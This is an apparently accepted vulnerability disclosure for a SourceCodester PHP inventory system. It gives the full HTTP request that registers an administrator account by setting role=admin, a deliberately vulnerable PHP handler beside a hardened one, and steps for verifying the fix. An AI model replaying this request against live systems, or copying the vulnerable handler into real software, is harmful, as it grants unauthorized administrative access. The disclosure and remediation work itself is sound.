Submission #836392: SourceCodester Inventory System using PHP and MySQL Source Code 0 Authorization Bypass (Info)

Title: SourceCodester Inventory System using PHP and MySQL Source Code 0 Authorization Bypass
Description: During the assessment of the application it was observed that the developer missed a critical check during account creation. The application lets a visitor create a staff account through register.php, which submits to api/users_handler.php, and the request body carries a role parameter. Setting that parameter to admin bypasses the restriction: instead of a staff account, the request creates an administrator account. The captured request (headers as recorded):

    POST /Product_Inventory/api/users_handler.php HTTP/1.1
    Host: localhost
    Content-Length: 84
    sec-ch-ua-platform: "macOS"
    Accept-Language: en-US,en;q=0.9
    sec-ch-ua: "Not-A.Brand";v="24", "Chromium";v="146"
    sec-ch-ua-mobile: ?0
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36
    Accept: */*
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://localhost
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: http://localhost/Product_Inventory/register.php
    Accept-Encoding: gzip, deflate, br
    Cookie: PHPSESSID=4k1d9iv3r8rfq72isu5j3utogq
    Connection: keep-alive

    full_name=fakeadmin&username=fakeadmin&password=fakeadmin&action=register&role=staff

The body above is what the registration form sends (role=staff). Changing it to the following creates an admin account:

    full_name=fakeadmin&username=fakeadmin&password=fakeadmin&action=register&role=admin

The server answers HTTP 200 and the account is created successfully:

    {"success":true,"message":"User registered successfully!"}
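The root cause described above is a role value accepted straight from the request body of an unauthenticated registration call. The following PHP is an added illustration, not the SourceCodester project's own users_handler.php: it shows the vulnerable pattern next to a hardened handler in which the server, not the client, decides the role. The table and column names (users: full_name, username, password, role), the session layout ($_SESSION['user']['role']) and the db.php include that returns a PDO connection are assumptions made for this example.

```php
<?php
// Added example, not the project's code. Assumed: a "users" table with columns
// full_name, username, password, role; $_SESSION['user']['role'] for the caller;
// db.php returning a configured PDO instance.
declare(strict_types=1);

const ALLOWED_ROLES = ['staff', 'admin'];

// Vulnerable pattern: whatever the client sends in "role" is stored verbatim,
// so an unauthenticated POST with role=admin yields an administrator account.
function register_vulnerable(PDO $pdo, array $post): array
{
    $role = $post['role'] ?? 'staff';
    $stmt = $pdo->prepare(
        'INSERT INTO users (full_name, username, password, role) VALUES (?, ?, ?, ?)'
    );
    $stmt->execute([
        $post['full_name'],
        $post['username'],
        password_hash((string) $post['password'], PASSWORD_DEFAULT),
        $role,
    ]);
    return ['success' => true, 'message' => 'User registered successfully!'];
}

// Hardened pattern: self-registration always produces "staff". Only a caller
// whose existing session already holds the admin role may pick a role, and
// then only from the allow-list. The client-supplied value is otherwise ignored.
function register_hardened(PDO $pdo, array $post, ?array $sessionUser): array
{
    foreach (['full_name', 'username', 'password'] as $field) {
        if (!isset($post[$field]) || trim((string) $post[$field]) === '') {
            return ['success' => false, 'message' => "Missing field: $field"];
        }
    }

    $role = 'staff';
    $requested = isset($post['role']) ? (string) $post['role'] : null;

    if (($sessionUser['role'] ?? null) === 'admin') {
        if ($requested !== null) {
            if (!in_array($requested, ALLOWED_ROLES, true)) {
                return ['success' => false, 'message' => 'Invalid role'];
            }
            $role = $requested;
        }
    } elseif ($requested !== null && $requested !== 'staff') {
        // Unprivileged caller tried to choose a role: drop it, but keep a trace.
        error_log(sprintf(
            'users_handler: ignored role=%s for username=%s',
            $requested,
            (string) $post['username']
        ));
    }

    $stmt = $pdo->prepare(
        'INSERT INTO users (full_name, username, password, role) VALUES (?, ?, ?, ?)'
    );
    $stmt->execute([
        $post['full_name'],
        $post['username'],
        password_hash((string) $post['password'], PASSWORD_DEFAULT),
        $role,
    ]);
    return ['success' => true, 'message' => 'User registered successfully!', 'role' => $role];
}

// Dispatch for the action=register call made by register.php.
if (PHP_SAPI !== 'cli' && ($_POST['action'] ?? '') === 'register') {
    session_start();
    $pdo = require __DIR__ . '/db.php'; // assumed: returns a PDO instance
    header('Content-Type: application/json');
    echo json_encode(register_hardened($pdo, $_POST, $_SESSION['user'] ?? null));
}
```

To check a fix of this shape, replay the captured request with role=admin from a fresh, unauthenticated session and confirm that the stored role is staff, then repeat it with an authenticated admin session and confirm that admin creation still works for that caller. The log line written on an ignored role is also a useful detection signal for attempts against the live application.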
User: Kamran Saifullah (UID 4218)
Submitted: 2026-05-24, 08:56 AM (16 days ago)
Moderation: 2026-06-07, 06:01 PM (14 days later)
Status: Accepted
VulDB Entry: 369139 [SourceCodester Inventory System 1.0 Account Creation users_handler.php ROLE privilege escalation]
Points: 17
